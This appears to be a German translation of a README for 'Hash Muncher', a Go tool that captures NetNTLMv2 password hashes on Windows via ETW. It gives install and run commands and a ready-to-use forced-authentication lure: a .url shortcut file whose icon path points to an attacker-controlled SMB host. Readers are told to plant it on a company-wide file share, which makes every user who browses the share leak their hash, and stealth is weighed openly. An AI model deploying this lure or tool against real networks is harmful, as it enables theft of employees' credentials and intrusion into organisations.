
Erfassen Sie NetNTLMv2-Hashes mithilfe von ETW mit Administratorrechten unter Windows 8.1 / Windows Server 2016 und neuer
Sammle NetNTLMv2-Hashes mithilfe von ETW mit Administratorrechten unter Windows
Es gibt drei verschiedene Optionen, um das Tool einzurichten und auszuführen
go install github.com/lkarlslund/hashmuncher@latest
git clone https://github.com/lkarlslund/hashmuncher
cd hashmuncher
./build.ps1
Stellen Sie sicher, dass die Windows-Firewall „Datei- und Druckerfreigabe“ zulässt, da Hash Muncher den integrierten SMB-Dienst benötigt, um die anfängliche Anforderung zu senden und Antwortpakete an das Ziel zu senden.
Führen Sie Hash Muncher in einer Eingabeaufforderung mit erhöhten Rechten aus
hashmuncher.exe [-output filename.txt] [-timeout nnn] [-tracename yourname] [-help]
[InternetShortcut]
URL=Munch
WorkingDirectory=MunchMunch
IconFile=\\10.1.2.3\%USERNAME%.icon
IconIndex=1
Ersetzen Sie die IP-Adresse durch Ihren Hach-Muncher-Rechner und speichern Sie die Datei als „whatever.url“ auf einer (unternehmensweiten) Dateifreigabe – und beobachten Sie, wie die Hashes hereinstromen.
Andere Methoden werden in den Red Team Notes – Forced Authentication erwähnt, und Sie können vermutlich auch Erfolg haben, indem Sie allen ein Word-Dokument mailen, aber das ist überhaupt nicht heimlich.
Ich habe mich immer wieder mit ETW beschäftigt, aber als ich die sehr coole Forschung von Nettitude Labs sah, wusste ich, dass ich daraus ein einfach zu bedienendes Tool in meiner Lieblingssprache Golang machen musste! Nettitude Labs hat einen funktionierenden POC, der in C# geschrieben ist und unter dem .Net-Framework läuft, und das könnte eine bessere Option für Sie sein. Ich erfinde hier also nicht wirklich etwas Neues, sondern füge lediglich eine Alternative hinzu.
Wenn Sie Windows-Sicherheit mögen, gefällt Ihnen vielleicht auch mein Angriffsgraphen-Tool Adalanche